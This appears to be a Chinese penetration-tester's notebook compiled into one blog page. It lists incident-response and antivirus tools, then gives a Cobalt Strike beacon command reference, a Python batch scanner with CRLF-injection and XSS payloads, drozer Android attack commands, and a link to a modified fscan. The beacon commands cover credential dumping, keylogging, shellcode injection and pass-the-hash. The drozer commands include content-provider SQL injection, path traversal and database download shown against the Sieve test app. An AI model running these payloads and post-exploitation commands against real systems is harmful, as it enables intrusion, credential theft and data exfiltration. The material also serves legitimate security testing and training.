windows应急响应工具篇 病毒分析PCHunter：http://www.xuetr.com火绒剑：https://www.huorong.cnProcess Explorer：https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorerprocesshacker：https://processhacker.sourceforge.io/downloads.phpautoruns：https://docs.microsoft.com/en-us/sysinternals/downloads/autorunsOTL：https://www.bleepingcomputer.com/download/otl/SysInspector：http://download.eset.com.cn/download/detail/?product=sysinspector病毒查杀卡巴斯基：http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe大蜘蛛：http://free.drweb.ru/download+cureit+free火绒安全软件：https://www.huorong.cn360杀毒：http://sd.360.cn/download_center.html病毒动态CVERC-国家计算机病毒应急处理中心：http://www.cverc.org.cn微步在线威胁情报社区：https://x.threatbook.cn火绒安全论坛：http://bbs.huorong.cn/forum-59-1.html在线病毒扫描网站多引擎在线病毒扫描网：http://www.virscan.org腾讯哈勃分析系统：https://habo.qq.comJotti恶意软件扫描系统：https://virusscan.jotti.org针对计算机病毒、手机病毒、可疑文件等进行检测分析：http://www.scanvir.comwebshell查杀D盾_Web查杀：http://www.d99net.net/index.asp河马webshell查杀：http://www.shellpub.com深信服Webshell网站后门检测工具：http://edr.sangfor.com.cn/backdoor_detection.html在线沙箱分析360安全大脑沙箱云：https://ata.360.net/dashboard微步云沙箱：https://s.threatbook.cn/魔盾安全分析：https://www.maldun.com/submit/submit_file/VirusTotal：https://www.virustotal.com/gui/home/upload

cs常用命令 browserpivot 注入受害者浏览器进程 bypassuac 绕过UAC cancel 取消正在进行的下载 cd 切换目录 checkin 强制让被控端回连一次 clear 清除beacon内部的任务队列 connect Connect to a Beacon peerover TCP covertvpn 部署Covert VPN客户端 cp 复制文件 dcsync 从DC中提取密码哈希 desktop 远程VNC dllinject 反射DLL注入进程 dllload 使用LoadLibrary将DLL加载到进程中 download 下载文件 downloads 列出正在进行的文件下载 drives 列出目标盘符 elevate 尝试提权 execute 在目标上执行程序(无输出) execute-assembly 在目标上内存中执行本地.NET程序 exit 退出beacon getprivs Enable system privileges oncurrent token getsystem 尝试获取SYSTEM权限 getuid 获取用户ID hashdump 转储密码哈希值 help 帮助 inject 在特定进程中生成会话 jobkill 杀死一个后台任务 jobs 列出后台任务 kerberos_ccache_use 从ccache文件中导入票据应用于此会话 kerberos_ticket_purge 清除当前会话的票据 kerberos_ticket_use 从ticket文件中导入票据应用于此会话 keylogger 键盘记录 kill 结束进程 link Connect to a Beacon peerover a named pipe logonpasswords 使用mimikatz转储凭据和哈希值 ls 列出文件 make_token 创建令牌以传递凭据 mimikatz 运行mimikatz mkdir 创建一个目录 mode dns 使用DNS A作为通信通道(仅限DNS beacon) mode dns-txt 使用DNS TXT作为通信通道(仅限D beacon) mode dns6 使用DNS AAAA作为通信通道(仅限DNS beacon) mode http 使用HTTP作为通信通道 mv 移动文件 net net命令 note 备注 portscan 进行端口扫描 powerpick 通过Unmanaged PowerShell执行命令 powershell 通过powershell.exe执行命令 powershell-import 导入powershell脚本 ppid Set parent PID forspawned post-ex jobs ps 显示进程列表 psexec Use a service to spawn asession on a host psexec_psh Use PowerShell to spawn asession on a host psinject 在特定进程中执行PowerShell命令 pth 使用Mimikatz进行传递哈希 pwd 当前目录位置 reg Query the registry rev2self 恢复原始令牌 rm 删除文件或文件夹 rportfwd 端口转发 run 在目标上执行程序(返回输出) runas 以另一个用户权限执行程序 runasadmin 在高权限下执行程序 runu Execute a program underanother PID screenshot 屏幕截图 setenv 设置环境变量 shell cmd执行命令 shinject 将shellcode注入进程 shspawn 生成进程并将shellcode注入其中 sleep 设置睡眠延迟时间 socks 启动SOCKS4代理 socks stop 停止SOCKS4 spawn Spawn a session spawnas Spawn a session as anotheruser spawnto Set executable tospawn processes into spawnu Spawn a session underanother PID ssh 使用ssh连接远程主机 ssh-key 使用密钥连接远程主机 steal_token 从进程中窃取令牌 timestomp 将一个文件时间戳应用到另一个文件 unlink Disconnect from parentBeacon upload 上传文件 wdigest 使用mimikatz转储明文凭据 winrm 使用WinRM在主机上生成会话 wmi 使用WMI在主机上生成会话 argue 进程参数欺骗

自研CRLF批量检测工具 使用requests模块简单实现了一下批量crlf漏洞的检测，代码如下import requests poc_list = ['%0D%0A%20Set-Cookie:whoami=yueying', '%20%0D%0ASet-Cookie:whoami=yueying', '%0A%20Set-Cookie:whoami=yueying', '%2F%2E%2E%0D%0ASet-Cookie:whoami=yueying', '%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=yueying'] xss = ''' 请自行尝试xss，payload如下。 payload1:https://xxx.xxx.com/%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>; payload2:https://xxx.xxx.com/%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE ''' GREEN = '\033[92m' # 绿色 RED = '\033[91m' # 红色 END = '\033[0m' # 结束 def respon(url): try: response = requests.get(url, timeout=8) response_header = str(response.headers) if 'yueying' in response_header: print(GREEN + '存在crlf漏洞！！') print(GREEN + '漏洞poc为:' + url) print(xss) else: print(RED + f'{url}未发现crlf漏洞') except: print(RED + f'{url}连接超时') def ping(url): try: ping = requests.get(url, timeout=8) if ping.status_code != 200: print(f'{url}无法访问') else: piliang() except: print(f'{url}无法访问') def piliang(): if url.endswith('/'): for poc in poc_list: new_url = url + poc respon(new_url) else: for poc in poc_list: new_url = url + '/' + poc respon(new_url) if __name__ == '__main__': bangzhu = ''' 欢迎使用crlf检测工具，作者月影 请将需要检测的域名列表放置当前目录下的url。txt中，然后执行本脚本 ''' print(bangzhu) with open('url.txt', 'r') as file: urls = file.readlines() urls = ['http://' + url.strip() if not url.startswith(('http://', 'https://')) else url.strip() for url in urls] for url in urls: ping(url) 效果展示

drozer常用命令 开始一个会话adb forward tcp:31415 tcp:31415 drozer console connect检索包信息run app.package.list -f <app name> run app.package.info -a <package name> run app.package.attacksurface Get attack surface of package run app.package.backup Lists packages that use the backup API (returns true on FLAG_ALLOW_BACKUP) run app.package.debuggable Find debuggable packages run app.package.info Get information about installed packages run app.package.launchintent Get launch intent of package run app.package.list List Packages run app.package.manifest Get AndroidManifest.xml of package run app.package.native Find Native libraries embedded in the application. run app.package.shareduid Look for packages with shared UIDs识别攻击面run app.package.attacksurface <package name>利用activityrun app.activity.info -a <package name> -u run app.activity.start --component <package name> <component name>利用内容提供商run app.provider.info -a <package name> run scanner.provider.finduris -a <package name> run app.provider.query <uri> run app.provider.update <uri> --selection <conditions> <selection arg> <column> <data> run scanner.provider.sqltables -a <package name> run scanner.provider.injection -a <package name> run scanner.provider.traversal -a <package name> run app.provider.finduri Find referenced content URIs in a package run app.provider.info Get information about exported content providers run app.provider.insert Insert into a Content Provider run app.provider.query Query a content provider run app.provider.read Read from a content provider that supports files run app.provider.update Update a record in a content provider利用广播接收器run app.broadcast.info -a <package name> run app.broadcast.send --component <package name> <component name> --extra <type> <key> <value> run app.broadcast.sniff --action <action>利用服务run app.service.info -a <package name> run app.service.start --action <action> --component <package name> <component name> run app.service.send <package name> <component name> --msg <what> <arg1> <arg2> --extra <type> <key> <value> --bundle-as-obj获取所有可访问的Uri命令 run scanner.provider.finduris -a <package name> 示例 run scanner.provider.finduris -a com.example.studayappp.sieveSQL注入命令 run app.provider.query <uri> [--projection] [--selection] 示例 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ 列出所有表 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type=‘table‘;--" 获取单表（如Key）的数据 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"检测SQL注入命令 run scanner.provider.injection -a <package name> 示例 run scanner.provider.injection -a com.example.studayappp.sieve检测目录遍历命令 run scanner.provider.traversal -a <package name> 示例 run scanner.provider.traversal -a com.example.studayappp.sieve读取文件系统下的文件示例 run app.provider.read content://com.example.studayappp.sieve.FileBackupProvider/etc/hosts下载数据库文件到本地示例 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db

fscan月影定制增强版v1.8.3 众所周知，fscan目前已经停止更新了，该版本基于1.8.2的基础上添加了一些poc，有自己写的，有网上收集的，后续还会继续更新链接在下面，自取：fscan64.rar